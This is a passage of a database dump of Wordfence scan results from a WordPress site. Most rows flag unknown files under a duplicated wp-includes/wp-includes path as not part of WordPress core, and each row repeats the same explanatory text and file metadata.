More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/rss-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34592,1631564712,1631564712,'new','knownfile',75,'1ae4930f6ab94db03278ebebbedc9a7b','fece73927e72dd21ad4bf51bfd89d7c5','Unknown file in WordPress core: wp-includes/wp-includes/rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:31:\"wp-includes/wp-includes/rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34593,1631564712,1631564712,'new','knownfile',75,'01a842690447a7ca4419a962e3be3dbb','2f833cdf54d11fbfa3053f10c705b15e','Unknown file in WordPress core: wp-includes/wp-includes/script-loader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/script-loader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34594,1631564712,1631564712,'new','knownfile',75,'e3f876f6a51baeef641c6b83dc9de233','e171f5c57f9067cb7a9f37697991ca4f','Unknown file in WordPress core: wp-includes/wp-includes/session.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/session.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34595,1631564712,1631564712,'new','knownfile',75,'193c572d13ff71059ceba35fda188b1e','068ed399e4047ba287cf0dc054d0b078','Unknown file in WordPress core: wp-includes/wp-includes/shortcodes.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/shortcodes.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34596,1631564712,1631564712,'new','knownfile',75,'30c8e63b025a994ca2e2611aa541cca9','d30b085bd3d4b290ae1f6f1e15691393','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34597,1631564712,1631564712,'new','knownfile',75,'c32bedba06761478ddf8ff84a2fef259','b18b0fe65637f86ca0d95d64005c123e','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34598,1631564712,1631564712,'new','knownfile',75,'9444084b6f6bd750854591c96ab95ede','6255bba980e742bf9a747a1414208963','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34599,1631564712,1631564712,'new','knownfile',75,'3f3121fd3b4f20cfc488a4c8fbfa8899','1ed52d426cb977dfb51881de50bb1257','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34600,1631564712,1631564712,'new','knownfile',75,'42d55028e6ba7d7f8c41d836ce3a280c','1fcda2b7209bab4ce1c192b4f6564155','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34601,1631564712,1631564712,'new','knownfile',75,'3816ead09fe210f40dc9d478ca8744d5','d0e2dcefda6a6a19060736b15b9ada13','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34602,1631564712,1631564712,'new','knownfile',75,'e7571fc8612358f48feae34ef2a2dbc3','88e6c4e5a4452ae25150aaae2dc860d7','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34603,1631564713,1631564713,'new','knownfile',75,'585e3deac0b1afe5768ef075adfd518e','a47994685c75ad7c03a1b9ddb7c58ac3','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34604,1631564713,1631564713,'new','knownfile',75,'bf960820c14e01e60a3219fa1284f5f3','a745eee7555ef8a3e9bee3faadc2b94d','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34605,1631564713,1631564713,'new','knownfile',75,'74464e2a8bcecd1700dec8723dd77ca4','39d94b220d9405d38651ba12055614d9','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/sitemaps.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34606,1631564713,1631564713,'new','knownfile',75,'80a02f995a7e74a874664a81a842c5ba','3dcd6d4f2f41fb23e2d13ff72f8d2ede','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/LICENSE','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/sodium_compat/LICENSE\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34607,1631564713,1631564713,'new','knownfile',75,'a916ec7764406b104063b96f5f7c0de7','0384da8fb6fd9aa6ee6631702c25acb2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/autoload-php7.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/autoload-php7.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34608,1631564713,1631564713,'new','knownfile',75,'367e2edb8d789932fd3d7ee3a8b82e86','f9407b4506fabe482ee00c2f66cdb51e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/autoload.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/sodium_compat/autoload.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34609,1631564713,1631564713,'new','knownfile',75,'bb384270f58c8acca50f1c6f26c8511a','1deefd53dd687bfd5edd56ced8dcfaa7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/composer.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/sodium_compat/composer.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34610,1631564713,1631564713,'new','knownfile',75,'2b1c7c7d90b732bcb2d8c0a31223c4fc','b41f72416cde1cdcb90176b776b9302f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/lib/constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34611,1631564713,1631564713,'new','knownfile',75,'25f103eaf2287f708819317590d2e4ad','5ca1d1b9602685d01e5e69289b1a1f1e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/namespaced.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/sodium_compat/lib/namespaced.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34612,1631564713,1631564713,'new','knownfile',75,'967f990d59f951319584be1bdce983ef','8da9a3b0e256b89aa70c6533e7d34933','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/php72compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/lib/php72compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34613,1631564713,1631564713,'new','knownfile',75,'4ff9d7ff1cee269750a6e0b34584073c','82513fc15669e025a87d2f6b290d8fb3','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34614,1631564713,1631564713,'new','knownfile',75,'7ee178af2f72bd98c6e6ce4ef83bca93','5e5efd267692876d21ba1542165feede','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34615,1631564713,1631564713,'new','knownfile',75,'c8fad0aab103c67217d886163e7d4d20','beb21866e15767135aa721f6b7958fbf','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/namespaced/Compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34616,1631564713,1631564713,'new','knownfile',75,'1289fcca6cef4405f0a0cbdffb8e351e','35628eb2e44ea173d3a489e570c53c90','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34617,1631564713,1631564713,'new','knownfile',75,'a05ac6525392c24f7fd20b83a346a43d','0a04567d9e8892eb026ba52f574cbe8e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34618,1631564713,1631564713,'new','knownfile',75,'c0177948159e5d3f07c153de37e926cd','8e22e661b7cf85317116f2b5bb16c814','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34619,1631564713,1631564713,'new','knownfile',75,'a728c2603102d4da1ad63ad08b8f6336','81df55e19de771268031de5f3e01cdca','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34620,1631564713,1631564713,'new','knownfile',75,'bf66b69f59ce1a3190e63e5765f209ed','42bb56818e051c90a635c649e364a532','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34621,1631564713,1631564713,'new','knownfile',75,'c823afa1da0a28262e3a979571cd1795','83e7b738e6a82f42ede2fde919e75812','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34622,1631564713,1631564713,'new','knownfile',75,'f87fae08f2f4ac5eb1939b7b41868f55','05beff85dceee43c87bd025606eaa890','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34623,1631564713,1631564713,'new','knownfile',75,'d5e852ca329c155ba27e73e6c7bba7a6','01ae593eec16cefc33cca602c4fbfd0c','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34624,1631564713,1631564713,'new','knownfile',75,'57080d4b5d8a3a83e5276851787184d4','799d5cd1d949f202164d4e4621e0c2ca','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34625,1631564713,1631564713,'new','knownfile',75,'d04dcb163b46892f990ac7e31a89873f','7219164d5bffc684941abc65be5f3aa1','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:79:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34626,1631564713,1631564713,'new','knownfile',75,'a200da728e9b954b75bfd5ac3a2f5852','91ef5aa67f8ce4dec95bfe4e2d3177d8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34627,1631564713,1631564713,'new','knownfile',75,'37e94cb3e502edc7d027a0887007de60','dc2cbb12ee115fcdca4e8ba42d70acf5','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34628,1631564713,1631564713,'new','knownfile',75,'f1b5f69ddb81b6410a3818f85a69b27c','ad7f47840c2eb6e55d4c381155b279ee','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34629,1631564713,1631564713,'new','knownfile',75,'eae16686a61263e83885574f076bbf82','12c0b3cbc74f259d0d2e5183faf702ed','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34630,1631564713,1631564713,'new','knownfile',75,'e04be688c74cb46a3281d561dc858c07','d024b274fa9778bfd561eeded8589c85','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes 